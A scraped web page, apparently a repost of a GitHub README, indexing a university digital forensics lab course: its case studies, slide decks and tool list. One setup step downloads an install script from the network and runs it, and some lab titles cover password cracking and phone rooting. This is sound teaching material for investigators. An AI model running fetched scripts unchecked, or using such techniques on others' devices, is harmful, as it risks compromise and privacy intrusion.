Tutorial</li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/3_Linux_command_line_tutorial.pptx" rel="nofollow" target="_blank" title="Linux Command Line Tutorial">Linux Command Line Tutorial</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/4_Advanced_linux_command_line.pptx" rel="nofollow" target="_blank" title="Advanced Linux Command Line Tutorial">Advanced Linux Command Line Tutorial</a></li> </ul> </li> <li>Computer and Digital Forensics (updated on Oct. 2021) <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/5_Introduction_to_digital_forensics.pptx" rel="nofollow" target="_blank" title="Introduction to Digital Forensics">Introduction to Digital Forensics</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/6_Sleuth_Kit_Tutorial.pptx" rel="nofollow" target="_blank" title="Sleuth Kit Tutorial">Sleuth Kit Tutorial</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/7_USB_Image_Acquisition.pptx" rel="nofollow" target="_blank" title="USB Image Acquisition">USB Image Acquisition</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/8_Evidence_search_techniques.pptx" rel="nofollow" target="_blank" title="Evidence Search Techniques">Evidence Search Techniques</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/9_Data_Carving.pptx" rel="nofollow" target="_blank" title="Data Carving">Data Carving</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/10_Steganography.pptx" rel="nofollow" target="_blank" title="Steganography">Steganography</a></li> 
<li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/Forensic_Report_Template.pdf" rel="nofollow" target="_blank" title="Forensic Report Template">Forensic Report Template</a></li> </ul> </li> <li>Computer Forensics Case Study <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-P2P-Data-Leakage" rel="nofollow" target="_blank" title="Investigating P2P Data Leakage">Investigating P2P Data Leakage</a> (added on June 2021)</li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-NIST-Data-Leakage" rel="nofollow" target="_blank" title="Investigating NIST Data Leakage">Investigating NIST Data Leakage</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Illegal-Possession-of-Images" rel="nofollow" target="_blank" title="Investigating Illegal Possession of Images">Investigating Illegal Possession of Images</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Email-Harassment" rel="nofollow" target="_blank" title="Investigating Email Harassment">Investigating Email Harassment</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-illegal-File-Transferring" rel="nofollow" target="_blank" title="Investigating Illegal File Transferring (Memory Forensics)">Investigating Illegal File Transferring (Memory Forensics)</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Hacking-Case" rel="nofollow" target="_blank" title="Investigating Hacking Case">Investigating Hacking Case</a></li> </ul> </li> <li>Mobile Forensics Case Study <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Investigating-Android-10" rel="nofollow" target="_blank" title="Investigating Android 10">Investigating Android 10</a> (added on Oct/24/2021)</li> <li>iOS 13 (to be released...)</li> </ul> </li> <li>Forensic Intelligence Repository 
<ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Email_Harassment" rel="nofollow" target="_blank" title="Email forensics">Email forensics</a></li> <li><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Illegal_Possession_Images" rel="nofollow" target="_blank" title="Illegal Possession of Images">Illegal Possession of Images</a></li> </ul> </li> <li>Tool Installation <ul dir="auto"> <li><a href="https://github.com/frankwxu/digital-forensics-lab#Tools-Used" rel="nofollow" target="_blank" title="Tools Used">Tools Used</a></li> <li><a href="https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/Kali_Installation_2020.pptx" rel="nofollow" target="_blank" title="Installation PPTs">Installation PPTs</a></li> <li>Installation Scripts (see commands as follows)</li> </ul> </li> </ul> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon. wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh chmod +x tool-install-zsh.sh ./tool-install-zsh.sh "><pre><code># The following commands will install all tools needed for Data Leakage Case. 
We will upgrade the script to add more tools for other labs soon.<br /><br />wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh<br />chmod +x tool-install-zsh.sh<br />./tool-install-zsh.sh</code></pre></div> <h3 dir="auto">Investigating P2P Data Leakage</h3> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case" rel="nofollow" target="_blank" title="P2P data leakage case study">P2P data leakage case study</a> helps students apply various forensic techniques to investigate intellectual property theft involving P2P. The study includes:</p> <ul dir="auto"> <li>A large and complex case involving a uTorrent client. The case is similar to the NIST data leakage lab but provides a clearer and more detailed timeline.</li> <li>Solid evidence with explanations. Each piece of evidence associated with an activity is explained along the timeline. 
We suggest working through this case before the NIST data leakage case study.</li> <li>10 hands-on labs/topics in digital forensics</li> </ul> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID00_Lab_Setup.pptx" rel="nofollow" target="_blank" title="Lab Environment Setting Up">Lab Environment Setting Up</a></td> <td>4M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID01_Disk_Image_and_Partitions.pptx" rel="nofollow" target="_blank" title="Disk Image and Partitions">Disk Image and Partitions</a></td> <td>5M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID02_Registry_and_File_Directory.pptx" rel="nofollow" target="_blank" title="Windows Registry and File Directory">Windows Registry and File Directory</a></td> <td>15M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx" rel="nofollow" target="_blank" title="MFT Timeline">MFT Timeline </a></td> <td>6M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx" rel="nofollow" target="_blank" title="USN Journal Timeline">USN Journal Timeline</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID05_uTorrent_Log_File.pptx" rel="nofollow" target="_blank" title="uTorrent Log File">uTorrent Log File </a></td> <td>9M</td> </tr> <tr> <td>Lab 6</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID06_File_Signature.pptx" rel="nofollow" 
target="_blank" title="File Signature">File Signature </a></td> <td>8M</td> </tr> <tr> <td>Lab 7</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID07_Emails.pptx" rel="nofollow" target="_blank" title="Emails">Emails </a></td> <td>9M</td> </tr> <tr> <td>Lab 8</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID08_Web_History.pptx" rel="nofollow" target="_blank" title="Web History">Web History </a></td> <td>11M</td> </tr> <tr> <td>Lab 9</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID09_Website_Analysis.pptx" rel="nofollow" target="_blank" title="Website Analysis">Website Analysis </a></td> <td>2M</td> </tr> <tr> <td>Lab 10</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/Questions.docx" rel="nofollow" target="_blank" title="Timeline (Summary)">Timeline (Summary)</a></td> <td>13K</td> </tr> </tbody></table><br /> <h3 dir="auto">Investigating NIST Data Leakage</h3> <p dir="auto">==============</p> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate an image involving intellectual property theft. The study include</p> <ul dir="auto"> <li>A large and complex case study created by NIST. You can access the <a href="https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html" rel="nofollow" target="_blank" title="Senario, DD/Encase images">Senario, DD/Encase images</a>. 
You can also find the <a href="https://www.cfreds.nist.gov/data_leakage_case/leakage-answers.pdf" rel="nofollow" target="_blank" title="solutions">solutions</a> on their website.</li> <li>14 hands-on labs/topics in digital forensics</li> </ul> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_00_Env_Setting.pptx" rel="nofollow" target="_blank" title="Environment Setting Up">Environment Setting Up</a></td> <td>2M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_01_Registry.pptx" rel="nofollow" target="_blank" title="Windows Registry">Windows Registry</a></td> <td>3M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx" rel="nofollow" target="_blank" title="Windows Event and XML">Windows Event and XML</a></td> <td>3M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx" rel="nofollow" target="_blank" title="Web History and SQL">Web History and SQL</a></td> <td>3M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx" rel="nofollow" target="_blank" title="Email Investigation">Email Investigation</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_05_USNJournaling.pptx" rel="nofollow" target="_blank" title="File Change History and USN Journal">File Change History and USN Journal</a></td> <td>2M</td> </tr> <tr> <td>Lab 6</td> 
<td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_06_Network_Shellbag_Jumplist.pptx" rel="nofollow" target="_blank" title="Network Evidence and shellbag">Network Evidence and shellbag</a></td> <td>2M</td> </tr> <tr> <td>Lab 7</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_07_NetworkDrive_Cloud.pptx" rel="nofollow" target="_blank" title="Network Drive and Cloud">Network Drive and Cloud</a></td> <td>5M</td> </tr> <tr> <td>Lab 8</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx" rel="nofollow" target="_blank" title="Master File Table ($MFT) and Log File ($logFile) Analysis">Master File Table ($MFT) and Log File ($logFile) Analysis</a></td> <td>13M</td> </tr> <tr> <td>Lab 9</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx" rel="nofollow" target="_blank" title="Windows Search History">Windows Search History</a></td> <td>4M</td> </tr> <tr> <td>Lab 10</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_10_Vol_Shadow_Copy.pptx" rel="nofollow" target="_blank" title="Windows Volume Shadow Copy Analysis">Windows Volume Shadow Copy Analysis</a></td> <td>6M</td> </tr> <tr> <td>Lab 11</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_11_RecycleBin_AntiForensics.pptx" rel="nofollow" target="_blank" title="Recycle Bin and Anti-Forensics">Recycle Bin and Anti-Forensics</a></td> <td>3M</td> </tr> <tr> <td>Lab 12</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_12_CD-R_Data_Carving.pptx" rel="nofollow" target="_blank" title="Data Carving">Data Carving</a></td> <td>3M</td> 
</tr> <tr> <td>Lab 13</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_13_Crack_Win10_Login_Password.pptx" rel="nofollow" target="_blank" title="Crack Windows Passwords">Crack Windows Passwords</a></td> <td>2M</td> </tr> </tbody></table><br /> <h3 dir="auto">Investigating Illegal Possession of Images</h3> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate the illegal possession of rhino images. The image was contributed by Dr. Golden G. Richard III and was originally used in the DFRWS 2005 Rodeo Challenge. NIST hosts the <a href="https://www.cfreds.nist.gov/dfrws/Rhino_Hunt.html" rel="nofollow" target="_blank" title="USB DD image">USB DD image</a>. A copy of the image is also available in the repository.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx" rel="nofollow" target="_blank" title="HTTP Analysis using Wireshark (text)">HTTP Analysis using Wireshark (text)</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx" rel="nofollow" target="_blank" title="HTTP Analysis using Wireshark (image)">HTTP Analysis using Wireshark (image)</a></td> <td>6M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx" rel="nofollow" target="_blank" title="Rhino Possession Investigation 1: File Recovering">Rhino Possession Investigation 1: File Recovering</a></td> <td>9M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx" rel="nofollow" target="_blank" title="Rhino Possession Investigation 2: Steganography">Rhino Possession Investigation 2: Steganography</a></td> <td>4M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx" rel="nofollow" target="_blank" title="Rhino Possession Investigation 3: Extract Evidence from FTP Traffic">Rhino Possession Investigation 3: Extract Evidence from FTP Traffic</a></td> <td>3M</td> </tr> <tr> <td>Lab 5</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx" rel="nofollow" target="_blank" title="Rhino Possession Investigation 4: Extract Evidence from HTTP Traffic">Rhino Possession Investigation 4: Extract Evidence from HTTP Traffic</a></td> <td>5M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Email Harassment</h3> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Email_Harassment" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate a harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the <a href="https://digitalcorpora.org/corpora/scenarios/nitroba-university-harassment-scenario" rel="nofollow" target="_blank" title="scenario description">scenario description</a> and <a href="http://downloads.digitalcorpora.org/corpora/scenarios/2008-nitroba/nitroba.pcap" rel="nofollow" target="_blank" title="network traffic">network traffic</a> from their website. The repository only provides lab instructions.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/0_Investigate_Harassment_Email_Wireshark.pptx" rel="nofollow" target="_blank" title="Investigating Harassment Email using Wireshark">Investigating Harassment Email using Wireshark</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/1_tshark_forensics_Introduction.pptx" rel="nofollow" target="_blank" title="tshark Forensics Introduction">tshark Forensics Introduction</a></td> <td>2M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/2_Investigate_Harassment_Email_TShark.pptx" rel="nofollow" target="_blank" title="Investigating Harassment Email using tshark">Investigating Harassment Email using tshark</a></td> <td>2M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Illegal File Transferring (Memory Forensics)</h3> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_File_Transferring_Memory_Forensics" rel="nofollow" target="_blank" title="case study">case study</a> is to investigate a memory image in order to reconstruct the timeline of an illegal data transfer. The scenario involves sensitive files being transferred from a server to a USB drive.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_File_Transferring_Memory_Forensics" rel="nofollow" target="_blank" title="Memory Forensics">Memory Forensics</a></td> <td>11M</td> </tr> <tr> <td>Part 1</td> <td>Understand the Suspect and Accounts</td> <td></td> </tr> <tr> <td>Part 2</td> <td>Understand the Suspect’s PC</td> <td></td> </tr> <tr> <td>Part 3</td> <td>Network Forensics</td> <td></td> </tr> <tr> <td>Part 4</td> <td>Investigate Command History</td> <td></td> </tr> <tr> <td>Part 5</td> <td>Investigate Suspect’s USB</td> <td></td> </tr> <tr> <td>Part 6</td> <td>Investigate <a href="https://www.kitploit.com/search/label/Internet%20Explorer" target="_blank" title="Internet Explorer">Internet Explorer</a> History</td> <td></td> </tr> <tr> <td>Part 7</td> <td>Investigate File Explorer History</td> <td></td> </tr> <tr> <td>Part 8</td> <td>Timeline Analysis</td> <td></td> </tr> </tbody></table> <h3 dir="auto">Investigating Hacking Case</h3> <p dir="auto">The <a href="https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Hacking_Case" rel="nofollow" target="_blank" title="case study">case study</a>, based on a disk image provided by <a href="https://www.cfreds.nist.gov/Hacking_Case.html" rel="nofollow" target="_blank" title="NIST">NIST</a>, is to investigate a hacker who intercepts internet traffic within range of wireless access points.</p> <p dir="auto"><strong>Topics Covered</strong></p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Hacking_Case/NIST_Hacking_Case.pptx" rel="nofollow" target="_blank" title="Hacking Case">Hacking Case</a></td> <td>8M</td> </tr> </tbody></table> <h3 dir="auto">Investigating Android 10</h3> <p dir="auto">The image was created by Joshua Hickman and is hosted by <a href="https://digitalcorpora.org/corpora/cell-phones/android-10" rel="nofollow" target="_blank" title="digitalcorpora">digitalcorpora</a>.</p> <table> <tbody><tr> <th>Labs</th> <th>Topics Covered</th> <th>Size of PPTs</th> </tr> <tr> <td>Lab 0</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/0_Intro_Pixel3_Andriod10.pptx" rel="nofollow" target="_blank" title="Intro Pixel 3">Intro Pixel 3</a></td> <td>3M</td> </tr> <tr> <td>Lab 1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/1_Pixel3_Image.pptx" rel="nofollow" target="_blank" title="Pixel 3 Image">Pixel 3 Image</a></td> <td>2M</td> </tr> <tr> <td>Lab 2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/2_Pixel3_Device_Investigation.pptx" rel="nofollow" target="_blank" title="Pixel 3 Device">Pixel 3 Device</a></td> <td>4M</td> </tr> <tr> <td>Lab 3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/3_Pixel3_System_settings.pptx" rel="nofollow" target="_blank" title="Pixel 3 System Setting">Pixel 3 System Setting</a></td> <td>5M</td> </tr> <tr> <td>Lab 4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/4_Overivew_App_Life_Cycle.pptx" rel="nofollow" target="_blank" title="Overview: App Life Cycle">Overview: App Life Cycle</a></td> <td>11M</td> </tr> <tr> <td>Lab 5.1.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_1_AOSP_App_Investigations_Messaging.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Messaging">AOSP App Investigations: Messaging</a></td> <td>4M</td> </tr> <tr> <td>Lab 5.1.2</td> <td><a 
href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_1_2_AOSP_App_Investigations_Contacts.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Contacts">AOSP App Investigations: Contacts</a></td> <td>3M</td> </tr> <tr> <td>Lab 5.1.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_1_GMS_App_Investigations_Messaging.pptx" rel="nofollow" target="_blank" title="AOSP App Investigations: Calendar">AOSP App Investigations: Calendar</a></td> <td>1M</td> </tr> <tr> <td>Lab 5.2.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Messaging">GMS App Investigations: Messaging</a></td> <td>6M</td> </tr> <tr> <td>Lab 5.2.2</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_2_GMS_App_Investigations_Dialer.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Dialer">GMS App Investigations: Dialer</a></td> <td>2M</td> </tr> <tr> <td>Lab 5.2.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_3_GMS_App_Investigations_Maps.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Maps">GMS App Investigations: Maps</a></td> <td>8M</td> </tr> <tr> <td>Lab 5.2.4</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_2_4_GMS_App_Investigations_Photos.pptx" rel="nofollow" target="_blank" title="GMS App Investigations: Photos">GMS App Investigations: Photos</a></td> <td>6M</td> </tr> <tr> <td>Lab 5.3.1</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_1_Third_Party_App_Investigation_kik.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: Kik">Third-Party App Investigations: Kik</a></td> <td>4M</td> </tr> <tr> <td>Lab 5.3.2</td> <td><a 
href="https://github.com/frankwxu/digital-forensics-lab/blob/main/5_3_2_Third_Party_App_Investigation%20_textnow.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: TextNow">Third-Party App Investigations: TextNow</a></td> <td>1M</td> </tr> <tr> <td>Lab 5.3.3</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/5_3_3_Third_Party_App_Investigation_whatsapp.pptx" rel="nofollow" target="_blank" title="Third-Party App Investigations: WhatsApp">Third-Party App Investigations: WhatsApp</a></td> <td>3M</td> </tr> <tr> <td>Lab 6</td> <td><a href="https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/6_Pixel3_rooting.pptx" rel="nofollow" target="_blank" title="Pixel 3 Rooting">Pixel 3 Rooting</a></td> <td>5M</td> </tr> </tbody></table> <h3 dir="auto">Tools Used</h3> <table> <tbody><tr> <th>Name</th> <th>Version</th> <th>Source</th> </tr> <tr> <td>Wine</td> <td>6.0</td> <td><a href="https://source.winehq.org/git/wine.git/" rel="nofollow" target="_blank" title="https://source.winehq.org/git/wine.git/">https://source.winehq.org/git/wine.git/</a></td> </tr> <tr> <td>Vinetto</td> <td>0.98</td> <td><a href="https://github.com/AtesComp/Vinetto" rel="nofollow" target="_blank" title="https://github.com/AtesComp/Vinetto">https://github.com/AtesComp/Vinetto</a></td> </tr> <tr> <td>imgclip</td> <td>05.12.2017</td> <td><a href="https://github.com/Arthelon/imgclip" rel="nofollow" target="_blank" title="https://github.com/Arthelon/imgclip">https://github.com/Arthelon/imgclip</a></td> </tr> <tr> <td>Tree</td> <td>06.01.2020</td> <td><a href="https://github.com/kddeisz/tree" rel="nofollow" target="_blank" title="https://github.com/kddeisz/tree">https://github.com/kddeisz/tree</a></td> </tr> <tr> <td>RegRipper</td> <td>3.0</td> <td><a href="https://github.com/keydet89/RegRipper3.0" rel="nofollow" target="_blank" 
title="https://github.com/keydet89/RegRipper3.0">https://github.com/keydet89/RegRipper3.0</a></td> </tr> <tr> <td>Windows-Prefetch-Parser</td> <td>05.01.2016</td> <td><a href="https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git" rel="nofollow" target="_blank" title="https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git">https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git</a></td> </tr> <tr> <td>python-evtx</td> <td>05.21.2020</td> <td><a href="https://github.com/williballenthin/python-evtx" rel="nofollow" target="_blank" title="https://github.com/williballenthin/python-evtx">https://github.com/williballenthin/python-evtx</a></td> </tr> <tr> <td>xmlstarlet</td> <td>1.6.1</td> <td><a href="https://github.com/fishjam/xmlstarlet" rel="nofollow" target="_blank" title="https://github.com/fishjam/xmlstarlet">https://github.com/fishjam/xmlstarlet</a></td> </tr> <tr> <td>hivex</td> <td>09.15.2020</td> <td><a href="https://github.com/libguestfs/hivex" rel="nofollow" target="_blank" title="https://github.com/libguestfs/hivex">https://github.com/libguestfs/hivex</a></td> </tr> <tr> <td>libesedb</td> <td>01.01.2021</td> <td><a href="https://github.com/libyal/libesedb" rel="nofollow" target="_blank" title="https://github.com/libyal/libesedb">https://github.com/libyal/libesedb</a></td> </tr> <tr> <td>pasco-project</td> <td>02.09.2017</td> <td><a href="https://annsli.github.io/pasco-project/" rel="nofollow" target="_blank" title="https://annsli.github.io/pasco-project/">https://annsli.github.io/pasco-project/</a></td> </tr> <tr> <td>libpff</td> <td>01.17.2021</td> <td><a href="https://github.com/libyal/libpff" rel="nofollow" target="_blank" title="https://github.com/libyal/libpff">https://github.com/libyal/libpff</a></td> </tr> <tr> <td>USN-Record-Carver</td> <td>05.21.2017</td> <td><a href="https://github.com/PoorBillionaire/USN-Record-Carver" rel="nofollow" target="_blank" 
title="https://github.com/PoorBillionaire/USN-Record-Carver">https://github.com/PoorBillionaire/USN-Record-Carver</a></td> </tr> <tr> <td>USN-Journal-Parser</td> <td>12.12.2018</td> <td><a href="https://github.com/PoorBillionaire/USN-Journal-Parser" rel="nofollow" target="_blank" title="https://github.com/PoorBillionaire/USN-Journal-Parser">https://github.com/PoorBillionaire/USN-Journal-Parser</a></td> </tr> <tr> <td>JLECmd</td> <td>1.4.0.0</td> <td><a href="https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip" rel="nofollow" target="_blank" title="https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip">https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip</a></td> </tr> <tr> <td>libnl-utils</td> <td>3.2.27</td> <td><a href="https://packages.ubuntu.com/xenial/libs/libnl-utils" rel="nofollow" target="_blank" title="https://packages.ubuntu.com/xenial/libs/libnl-utils">https://packages.ubuntu.com/xenial/libs/libnl-utils</a></td> </tr> <tr> <td>time_decode</td> <td>12.13.2020</td> <td><a href="https://github.com/digitalsleuth/time_decode" rel="nofollow" target="_blank" title="https://github.com/digitalsleuth/time_decode">https://github.com/digitalsleuth/time_decode</a></td> </tr> <tr> <td>analyzeMFT</td> <td>2.0.4</td> <td><a href="https://github.com/dkovar/analyzeMFT" rel="nofollow" target="_blank" title="https://github.com/dkovar/analyzeMFT">https://github.com/dkovar/analyzeMFT</a></td> </tr> <tr> <td>libvshadow</td> <td>12.20.2020</td> <td><a href="https://github.com/libyal/libvshadow" rel="nofollow" target="_blank" title="https://github.com/libyal/libvshadow">https://github.com/libyal/libvshadow</a></td> </tr> <tr> <td>recentfilecache-parser</td> <td>02.13.2018</td> <td><a href="https://github.com/prolsen/recentfilecache-parser" rel="nofollow" target="_blank" title="https://github.com/prolsen/recentfilecache-parser">https://github.com/prolsen/recentfilecache-parser</a></td> </tr> </tbody></table> <h2 dir="auto">Contributors</h2> <ul dir="auto"> <li>Frank Xu</li> <li>Malcolm Hayward</li> <li>Richard (Max) Wheeless</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" 